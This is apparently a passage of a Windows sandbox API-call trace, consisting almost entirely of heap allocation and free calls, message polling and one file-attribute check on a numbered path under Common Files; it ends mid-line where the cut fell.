[0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda4fb8 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9dc0 [0248.093] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5008 | out: hHeap=0xbe0000) returned 1 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ac0 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5008 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5028 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6a8 [0248.093] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5008 | out: hHeap=0xbe0000) returned 1 [0248.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9bc8 [0248.094] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5008 [0248.094] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5058 [0248.094] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b50 [0248.094] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5008 | out: hHeap=0xbe0000) returned 1 [0248.094] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9af0 [0248.094] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5008 [0248.094] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5068 [0248.094] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f40 [0248.094] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5008 | out: hHeap=0xbe0000) returned 1 [0248.094] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa120 [0248.094] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5008 [0248.094] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5078 [0248.094] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f88 [0248.094] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5008 | out: hHeap=0xbe0000) returned 1 [0248.094] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfaa50 [0248.095] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5008 [0248.095] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5088 [0248.095] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0f0 [0248.095] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5008 | out: hHeap=0xbe0000) returned 1 [0248.095] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xc1b048 [0248.095] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe03160 | out: hHeap=0xbe0000) returned 1 [0248.095] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa198 [0248.095] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5008 [0248.095] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5098 [0248.095] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0248.095] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5008 | out: hHeap=0xbe0000) returned 1 [0248.095] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa150 [0248.095] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6f0 | out: hHeap=0xbe0000) returned 1 [0248.095] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5038 | out: hHeap=0xbe0000) returned 1 [0248.095] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b20 | out: hHeap=0xbe0000) returned 1 [0248.095] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa618 | out: hHeap=0xbe0000) returned 1 [0248.095] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5048 | out: hHeap=0xbe0000) returned 1 [0248.095] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9e08 | out: hHeap=0xbe0000) returned 1 [0248.095] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9bf8 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda4fe8 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa600 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9dc0 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda4fb8 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ac0 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6a8 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5028 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9bc8 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b50 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5058 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9af0 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f40 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5068 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa120 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f88 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5078 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfaa50 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0f0 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5088 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa198 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5098 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa150 | out: hHeap=0xbe0000) returned 1 [0248.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1b048 | out: hHeap=0xbe0000) returned 1 [0248.097] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ad8 | out: hHeap=0xbe0000) returned 1 [0248.097] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe03430 | out: hHeap=0xbe0000) returned 1 [0248.097] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda4ff8 | out: hHeap=0xbe0000) returned 1 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ad8 [0248.097] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa708 | out: hHeap=0xbe0000) returned 1 [0248.097] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9df0 | out: hHeap=0xbe0000) returned 1 [0248.097] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe02fa8 | out: hHeap=0xbe0000) returned 1 [0248.097] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5018 | out: hHeap=0xbe0000) returned 1 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02fa8 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9df0 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5018 [0248.097] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9df0 | out: hHeap=0xbe0000) returned 1 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03430 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9df0 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa708 [0248.097] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ad8 | out: hHeap=0xbe0000) returned 1 [0248.097] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda4ff8 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5098 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03160 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ad8 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5088 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa150 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5078 [0248.097] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xd01010 [0248.098] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0248.098] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5068 [0248.098] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcff388 [0248.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0248.098] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0248.098] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x80) returned 0xc41178 [0248.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcff388 | out: hHeap=0xbe0000) returned 1 [0248.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0248.098] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0248.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0248.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd01010 | out: hHeap=0xbe0000) returned 1 [0248.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5078 | out: hHeap=0xbe0000) returned 1 [0248.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5088 | out: hHeap=0xbe0000) returned 1 [0248.098] GetFileAttributesW (lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370" (normalized: "c:\\progra~2\\common~1\\26207383702620738370")) returned 0x20 [0248.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc41178 | out: hHeap=0xbe0000) returned 1 [0248.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5068 | out: hHeap=0xbe0000) returned 1 [0248.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa150 | out: hHeap=0xbe0000) returned 1 [0248.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ad8 | out: hHeap=0xbe0000) returned 1 [0248.098] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe03160 | out: hHeap=0xbe0000) returned 1 [0248.099] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5098 | out: hHeap=0xbe0000) returned 1 [0248.099] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda4ff8 | out: hHeap=0xbe0000) returned 1 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xe33dd0 [0248.099] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.099] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe33dd0 | out: hHeap=0xbe0000) returned 1 [0248.099] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03160 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ad8 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda4ff8 [0248.099] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ad8 | out: hHeap=0xbe0000) returned 1 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe026c0 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ad8 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa150 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5098 [0248.099] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa150 | out: hHeap=0xbe0000) returned 1 [0248.099] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5098 | out: hHeap=0xbe0000) returned 1 [0248.099] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02e68 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa150 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5098 [0248.099] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa150 | out: hHeap=0xbe0000) returned 1 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03020 [0248.099] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa150 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5068 [0248.100] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0248.100] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5068 | out: hHeap=0xbe0000) returned 1 [0248.100] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02d78 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5068 [0248.100] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa048 | out: hHeap=0xbe0000) returned 1 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe026e8 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa048 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa198 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5088 [0248.100] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa198 | out: hHeap=0xbe0000) returned 1 [0248.100] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5088 | out: hHeap=0xbe0000) returned 1 [0248.100] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02dc8 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa198 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5088 [0248.100] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa198 | out: hHeap=0xbe0000) returned 1 [0248.100] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcff388 [0248.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa198 [0248.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0f0 [0248.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5078 [0248.101] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0f0 | out: hHeap=0xbe0000) returned 1 [0248.101] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5078 | out: hHeap=0xbe0000) returned 1 [0248.101] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02698 [0248.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0f0 [0248.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5078 [0248.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfaa50 [0248.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f88 [0248.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5058 [0248.101] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f88 | out: hHeap=0xbe0000) returned 1 [0248.101] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5058 | out: hHeap=0xbe0000) returned 1 [0248.101] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02f08 [0248.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f88 [0248.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5058 [0248.101] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f88 | out: hHeap=0xbe0000) returned 1 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03458 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f88 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa120 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5028 [0248.102] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa120 | out: hHeap=0xbe0000) returned 1 [0248.102] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5028 | out: hHeap=0xbe0000) returned 1 [0248.102] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03480 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa120 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5028 [0248.102] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa120 | out: hHeap=0xbe0000) returned 1 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe034a8 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa120 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f40 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda4fb8 [0248.102] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f40 | out: hHeap=0xbe0000) returned 1 [0248.102] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda4fb8 | out: hHeap=0xbe0000) returned 1 [0248.102] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe034d0 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f40 [0248.102] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda4fb8 [0248.103] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f40 | out: hHeap=0xbe0000) returned 1 [0248.103] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe034f8 [0248.103] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f40 [0248.103] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9af0 [0248.103] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda4fe8 [0248.103] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9af0 | out: hHeap=0xbe0000) returned 1 [0248.103] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda4fe8 | out: hHeap=0xbe0000) returned 1 [0248.103] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.103] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03520 [0248.103] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9af0 [0248.103] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda4fe8 [0248.103] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9af0 | out: hHeap=0xbe0000) returned 1 [0248.103] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03548 [0248.103] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9af0 [0248.103] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b50 [0248.103] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5048 [0248.103] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b50 | out: hHeap=0xbe0000) returned 1 [0248.104] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5048 | out: hHeap=0xbe0000) returned 1 [0248.104] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03570 [0248.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b50 [0248.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5048 [0248.104] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b50 | out: hHeap=0xbe0000) returned 1 [0248.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe03598 [0248.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b50 [0248.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9bc8 [0248.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5038 [0248.104] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9bc8 | out: hHeap=0xbe0000) returned 1 [0248.104] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5038 | out: hHeap=0xbe0000) returned 1 [0248.104] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe035c0 [0248.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9bc8 [0248.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xda5038 [0248.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6a8 [0248.104] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9ac0 [0248.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda5008 [0248.105] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ac0 | out: hHeap=0xbe0000) returned 1 [0248.105] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda5008 | out: hHeap=0xbe0000) returned 1 [0248.105] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.105] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe035e8 [0248.105] RtlAllocateHeap (HeapHandle=0xbe0000, 